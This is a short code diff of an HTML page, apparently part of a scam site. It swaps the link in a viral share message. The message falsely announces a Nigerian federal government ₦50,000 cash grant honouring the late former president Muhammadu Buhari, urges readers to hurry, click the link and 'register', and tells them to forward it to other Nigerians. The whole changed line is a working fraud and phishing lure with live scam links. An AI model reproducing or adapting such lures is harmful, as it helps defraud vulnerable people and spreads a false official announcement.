--- a/buhari.html
+++ b/buhari.html
@@ -838,7 +838,7 @@ $(document).click(function () {
 -->
      
             <script>
-          var text1 ="*FG DECLARES PUBLIC HOLIDAY AND ₦50,000 CASH GRANT TO NIGERIANS IN HONOUR OF LATE FORMER PRESIDENT MUHAMMADU BUHARI*%0A%0A _Hurry Now and withdraw your ₦50,000 cash now_%0A%0A *Check Link Below*👇%0A https://nddc-payment.vzq.buzz%0A%0AN.B: SHARE WITH OTHER NIGERIANS LET THEM ALL BENEFIT FROM THE *GRANT*",
+          var text1 ="*FG DECLARES PUBLIC HOLIDAY AND ₦50,000 CASH GRANT TO NIGERIANS IN HONOUR OF LATE FORMER PRESIDENT MUHAMMADU BUHARI*%0A%0A _Hurry Now and withdraw your ₦50,000 cash now_%0A%0A *Check Link Below*👇%0A https://sureplug.org/buhari%0A%0AN.B: SHARE WITH OTHER NIGERIANS LET THEM ALL BENEFIT FROM THE *GRANT*",
         
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
